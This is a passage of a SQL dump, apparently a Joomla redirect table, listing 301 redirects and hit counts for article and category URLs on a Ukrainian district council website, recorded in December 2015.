00:00:00',301),(21507,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1199:-l-r-&Itemid=97&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:51:26','0000-00-00 00:00:00',301),(21508,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=482:-2012-2015-&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:51:31','0000-00-00 00:00:00',301),(21509,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1205:2014-01-31-07-53-03&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:51:36','0000-00-00 00:00:00',301),(21510,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1162:2013-12-19-06-13-29&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:51:38','0000-00-00 00:00:00',301),(21511,'http://www.malyn-rayrada.org.ua/index.php?id=39&Itemid=76&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','','',4,0,'2015-12-11 03:51:45','0000-00-00 00:00:00',301),(21512,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1064:2013-08-09-07-52-21&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:51:59','0000-00-00 00:00:00',301),(21513,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1110:-9-2013-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:52:15','0000-00-00 00:00:00',301),(21514,'http://www.malyn-rayrada.org.ua/index.php?id=36&Itemid=70&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2015-12-11 03:52:27','0000-00-00 00:00:00',301),(21515,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=744:2012-07-28-09-50-03&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:52:29','0000-00-00 00:00:00',301),(21516,'http://www.malyn-rayrada.org.ua/index.php?catid=31:-25032011&id=275:---------------2011-&Itemid=62&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:52:34','0000-00-00 00:00:00',301),(21517,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=748:2012-08-12-17-56-55&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:52:36','0000-00-00 00:00:00',301),(21518,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1053:2013-07-19-11-34-22&Itemid=92&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:52:39','0000-00-00 00:00:00',301),(21519,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1327:2014-06-01-11-51-13&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 03:52:45','0000-00-00 00:00:00',301),(21520,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=504:-2012-&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:52:47','0000-00-00 00:00:00',301),(21521,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=840:-2007-2015-&Itemid=85&lang=uk&option=com_content&view=article','','','',5,0,'2015-12-11 03:52:50','0000-00-00 00:00:00',301),(21522,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1047:2013-07-10-05-51-36&Itemid=92&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:52:53','0000-00-00 00:00:00',301),(21523,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=190:2010-12-15-13-24-17&Itemid=60&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:52:55','0000-00-00 00:00:00',301),(21524,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=279:2011-03-31-08-20-23&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:53:00','0000-00-00 00:00:00',301),(21525,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=441:-l-2011-2014-r-&Itemid=72&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:53:02','0000-00-00 00:00:00',301),(21526,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=678:----------------2012-2014-&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:53:12','0000-00-00 00:00:00',301),(21527,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1156:2013-12-09-07-12-03&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:53:16','0000-00-00 00:00:00',301),(21528,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=489:2011-12-02-06-51-07&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:53:18','0000-00-00 00:00:00',301),(21529,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=908:2013-01-21-08-58-40&Itemid=70&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:53:20','0000-00-00 00:00:00',301),(21530,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=565:2012-02-03-09-48-29&Itemid=76&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:53:23','0000-00-00 00:00:00',301),(21531,'http://www.malyn-rayrada.org.ua/index.php?id=46:--21122012&Itemid=85&lang=uk&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-11 03:53:25','0000-00-00 00:00:00',301),(21532,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1314:2014-05-14-11-53-26&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-11 03:53:36','0000-00-00 00:00:00',301),(21533,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1126:2013-10-31-12-52-35&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:53:38','0000-00-00 00:00:00',301),(21534,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=762:-210-&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:53:41','0000-00-00 00:00:00',301),(21535,'http://www.malyn-rayrada.org.ua/index.php?id=38&Itemid=73&lang=en&layout=blog&limitstart=30&option=com_content&view=category','','','',3,0,'2015-12-11 03:53:45','0000-00-00 00:00:00',301),(21536,'http://www.malyn-rayrada.org.ua/index.php?catid=54:--29112013-&id=1152:2013-11-28-14-58-05&Itemid=95&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:53:50','0000-00-00 00:00:00',301),(21537,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1165:-2014-&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:53:52','0000-00-00 00:00:00',301),(21538,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1057:--22072013--2100-&Itemid=0&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:54:01','0000-00-00 00:00:00',301),(21539,'http://www.malyn-rayrada.org.ua/index.php?id=44:--12092012-&Itemid=83&lang=ru&layout=blog&option=com_content&view=category','','','',3,0,'2015-12-11 03:54:06','0000-00-00 00:00:00',301),(21540,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=935:----------14-112012332-l------r&Itemid=86&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:54:11','0000-00-00 00:00:00',301),(21541,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=646:2012-04-08-07-58-55&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:54:15','0000-00-00 00:00:00',301),(21542,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=927:2013-02-21-09-06-04&Itemid=86&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:54:24','0000-00-00 00:00:00',301),(21543,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1315:-31-6-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 03:54:29','0000-00-00 00:00:00',301),(21544,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1013:2013-06-01-03-58-38&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:54:41','0000-00-00 00:00:00',301),(21545,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1197:-l-r-&Itemid=97&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:55:11','0000-00-00 00:00:00',301),(21546,'http://www.malyn-rayrada.org.ua/index.php?id=57&Itemid=98&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-11 03:55:18','0000-00-00 00:00:00',301),(21547,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1208:2014-01-31-13-48-49&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:55:24','0000-00-00 00:00:00',301),(21548,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1060:2013-07-27-10-13-15&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:55:27','0000-00-00 00:00:00',301),(21549,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1163:2013-12-20-07-44-35&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:55:29','0000-00-00 00:00:00',301),(21550,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=514:2011-12-22-10-03-07&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:55:31','0000-00-00 00:00:00',301),(21551,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=671:2012-05-09-13-09-05&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:55:34','0000-00-00 00:00:00',301),(21552,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1311:-69-1941-1945-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-11 03:55:43','0000-00-00 00:00:00',301),(21553,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=688:2012-05-25-16-34-51&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:55:45','0000-00-00 00:00:00',301),(21554,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=671:2012-05-09-13-09-05&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:55:47','0000-00-00 00:00:00',301),(21555,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=554:-l-r&Itemid=76&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:55:52','0000-00-00 00:00:00',301),(21556,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=548:-2011-2015-&Itemid=76&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:55:54','0000-00-00 00:00:00',301),(21557,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=958:------------2010-2015-&Itemid=70&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-11 03:55:56','0000-00-00 00:00:00',301),(21558,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=844:-2013-&Itemid=85&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:56:32','0000-00-00 00:00:00',301),(21559,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=677:------------2012-2015-&Itemid=80&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:56:38','0000-00-00 00:00:00',301),(21560,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1107:c-&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:56:41','0000-00-00 00:00:00',301),(21561,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1325:2014-05-29-06-00-31&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-11 03:56:43','0000-00-00 00:00:00',301),(21562,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=997:-27-&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:56:54','0000-00-00 00:00:00',301),(21563,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1097:2013-09-25-08-35-50&Itemid=0&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:56:59','0000-00-00 00:00:00',301),(21564,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=749:2012-08-24-05-59-17&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:57:01','0000-00-00 00:00:00',301),(21565,'http://www.malyn-rayrada.org.ua/index.php?id=51&Itemid=92&lang=en&layout=blog&limitstart=20&option=com_content&view=category','','','',2,0,'2015-12-11 03:57:24','0000-00-00 00:00:00',301),(21566,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=452:-20-2011-100-l-r-&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:57:26','0000-00-00 00:00:00',301),(21567,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=583:-l-lr&Itemid=77&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:57:31','0000-00-00 00:00:00',301),(21568,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1315:-31-6-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-11 03:57:38','0000-00-00 00:00:00',301),(21569,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1204:2014-01-31-07-51-23&Itemid=97&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:57:40','0000-00-00 00:00:00',301),(21570,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1131:9-------&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:57:45','0000-00-00 00:00:00',301),(21571,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=907:2013-01-21-08-54-59&Itemid=86&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:57:52','0000-00-00 00:00:00',301),(21572,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1110:-9-2013-&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 03:57:56','0000-00-00 00:00:00',301),(21573,'http://www.malyn-rayrada.org.ua/index.php?catid=48&id=961:2013-03-11-10-51-56&Itemid=87&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:58:06','0000-00-00 00:00:00',301),(21574,'http://www.malyn-rayrada.org.ua/index.php?catid=54:--29112013-&id=1153:-2013-&Itemid=95&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:58:08','0000-00-00 00:00:00',301),(21575,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=863:-qq&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:58:11','0000-00-00 00:00:00',301),(21576,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=773:2012-10-02-06-48-57&Itemid=84&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:58:19','0000-00-00 00:00:00',301),(21577,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1183:2014-01-28-09-18-31&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:58:22','0000-00-00 00:00:00',301),(21578,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=633:-2015-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:58:27','0000-00-00 00:00:00',301),(21579,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1220:2014-02-21-15-56-19&Itemid=0&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 03:58:29','0000-00-00 00:00:00',301),(21580,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1047:2013-07-10-05-51-36&Itemid=92&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:58:31','0000-00-00 00:00:00',301),(21581,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1289:2014-04-23-06-53-01&Itemid=17&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:59:02','0000-00-00 00:00:00',301),(21582,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1046:-2013-&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:59:04','0000-00-00 00:00:00',301),(21583,'http://www.malyn-rayrada.org.ua/index.php?id=31:-25032011&Itemid=62&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2015-12-11 03:59:06','0000-00-00 00:00:00',301),(21584,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=897:2013-01-18-07-40-55&Itemid=86&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:59:12','0000-00-00 00:00:00',301),(21585,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=748:2012-08-12-17-56-55&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:59:14','0000-00-00 00:00:00',301),(21586,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1109:2013-10-18-10-25-30&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:59:16','0000-00-00 00:00:00',301),(21587,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=705:-l-r&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:59:23','0000-00-00 00:00:00',301),(21588,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1192:-2014-2015-&Itemid=97&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:59:30','0000-00-00 00:00:00',301),(21589,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1125:2013-10-31-07-20-16&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:59:32','0000-00-00 00:00:00',301),(21590,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=832:-9-2012-&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:59:51','0000-00-00 00:00:00',301),(21591,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1125:2013-10-31-07-20-16&Itemid=14&lang=en&option=com_content&view=article','','','',9,0,'2015-12-11 04:00:38','0000-00-00 00:00:00',301),(21592,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=541:2012-01-26-11-55-32&Itemid=76&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:00:40','0000-00-00 00:00:00',301),(21593,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=560:2012-02-02-08-56-53&Itemid=76&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 04:00:47','0000-00-00 00:00:00',301),(21594,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1057:--22072013--2100-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:01:11','0000-00-00 00:00:00',301),(21595,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=411:------------2014-&Itemid=70&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 04:01:22','0000-00-00 00:00:00',301),(21596,'http://www.malyn-rayrada.org.ua/index.php?id=55:--26122013-&Itemid=96&lang=uk&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-11 04:01:24','0000-00-00 00:00:00',301),(21597,'http://www.malyn-rayrada.org.ua/index.php?catid=34&id=350:-----l---28r----&Itemid=68&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:01:32','0000-00-00 00:00:00',301),(21598,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1110:-9-2013-&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:01:41','0000-00-00 00:00:00',301),(21599,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1008:2013-05-20-07-02-57&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:01:43','0000-00-00 00:00:00',301),(21600,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=996:2013-04-25-12-09-57&Itemid=17&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:01:47','0000-00-00 00:00:00',301),(21601,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1327:2014-06-01-11-51-13&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-11 04:01:50','0000-00-00 00:00:00',301),(21602,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=647:2012-04-09-08-35-02&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:01:54','0000-00-00 00:00:00',301),(21603,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1220:2014-02-21-15-56-19&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:02:15','0000-00-00 00:00:00',301),(21604,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=582:2012-02-27-13-18-37&Itemid=77&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 04:02:18','0000-00-00 00:00:00',301),(21605,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1064:2013-08-09-07-52-21&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:02:28','0000-00-00 00:00:00',301),(21606,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=692:-2012&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:02:37','0000-00-00 00:00:00',301),(21607,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=191:2010-12-15-13-27-06&Itemid=60&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:02:39','0000-00-00 00:00:00',301),(21608,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=627:2012-04-02-15-57-23&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:02:41','0000-00-00 00:00:00',301),(21609,'http://www.malyn-rayrada.org.ua/index.php?id=45:--14112012-&Itemid=3&lang=en&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2015-12-11 04:02:45','0000-00-00 00:00:00',301),(21610,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=779:2012-10-03-12-34-44&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 04:02:50','0000-00-00 00:00:00',301),(21611,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=784:-9-&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:03:26','0000-00-00 00:00:00',301),(21612,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1185:2014-01-28-09-38-54&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:03:37','0000-00-00 00:00:00',301),(21613,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=644:2012-04-04-09-52-48&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:03:48','0000-00-00 00:00:00',301),(21614,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1318:----3110&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 04:03:50','0000-00-00 00:00:00',301),(21615,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1095:2013-09-24-13-25-55&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:03:58','0000-00-00 00:00:00',301),(21616,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=675:2012-05-17-09-49-52&Itemid=80&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 04:04:05','0000-00-00 00:00:00',301),(21617,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=793:2012-10-17-06-29-27&Itemid=84&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 04:04:07','0000-00-00 00:00:00',301),(21618,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=678:----------------2012-2014-&Itemid=80&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 04:04:22','0000-00-00 00:00:00',301),(21619,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=862:------qq&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:04:26','0000-00-00 00:00:00',301),(21620,'http://www.malyn-rayrada.org.ua/index.php?catid=34&id=350:-----l---28r----&Itemid=68&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:04:30','0000-00-00 00:00:00',301),(21621,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=964:-2013-2017-&Itemid=88&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:04:33','0000-00-00 00:00:00',301),(21622,'http://www.malyn-rayrada.org.ua/index.php?catid=48:--11032013-&id=961:2013-03-11-10-51-56&Itemid=87&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:04:45','0000-00-00 00:00:00',301),(21623,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1105:2013-10-11-16-43-25&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:04:54','0000-00-00 00:00:00',301),(21624,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=866:2012-12-14-06-58-01&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:05:04','0000-00-00 00:00:00',301),(21625,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1079:-l-2011-2013-r&Itemid=94&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:05:06','0000-00-00 00:00:00',301),(21626,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=670:2012-05-08-05-15-51&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 04:05:19','0000-00-00 00:00:00',301),(21627,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=995:-2012-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:05:31','0000-00-00 00:00:00',301),(21628,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=509:2011-12-20-08-03-11&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:05:33','0000-00-00 00:00:00',301),(21629,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=639:2012-04-03-12-41-18&Itemid=80&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 04:05:35','0000-00-00 00:00:00',301),(21630,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=827:2012-11-20-17-44-21&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:05:53','0000-00-00 00:00:00',301),(21631,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1061:2013-07-29-08-58-16&Itemid=&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 04:06:05','0000-00-00 00:00:00',301),(21632,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1046:-----------2013----&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:06:16','0000-00-00 00:00:00',301),(21633,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1291:2014-04-23-11-37-34&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:06:18','0000-00-00 00:00:00',301),(21634,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=718:2012-06-14-15-24-50&Itemid=82&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 04:06:21','0000-00-00 00:00:00',301),(21635,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=842:2012-12-10-13-55-57&Itemid=85&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:06:23','0000-00-00 00:00:00',301),(21636,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1090:-l-r-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:06:59','0000-00-00 00:00:00',301),(21637,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=774:2012-10-02-09-30-45&Itemid=70&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 04:07:01','0000-00-00 00:00:00',301),(21638,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=616:----l-r&Itemid=77&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:07:05','0000-00-00 00:00:00',301),(21639,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=438:-----------l--r&Itemid=72&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:07:10','0000-00-00 00:00:00',301),(21640,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1172:2014-01-14-14-46-07&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 04:07:13','0000-00-00 00:00:00',301),(21641,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1089:--------l---r---&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:07:15','0000-00-00 00:00:00',301),(21642,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1021:-l-r&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:07:25','0000-00-00 00:00:00',301),(21643,'http://www.malyn-rayrada.org.ua/index.php?id=52:--16082013-&Itemid=93&lang=uk&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-11 04:07:27','0000-00-00 00:00:00',301),(21644,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1165:-2014-&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:07:36','0000-00-00 00:00:00',301),(21645,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=451:-2011-2015-&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:07:39','0000-00-00 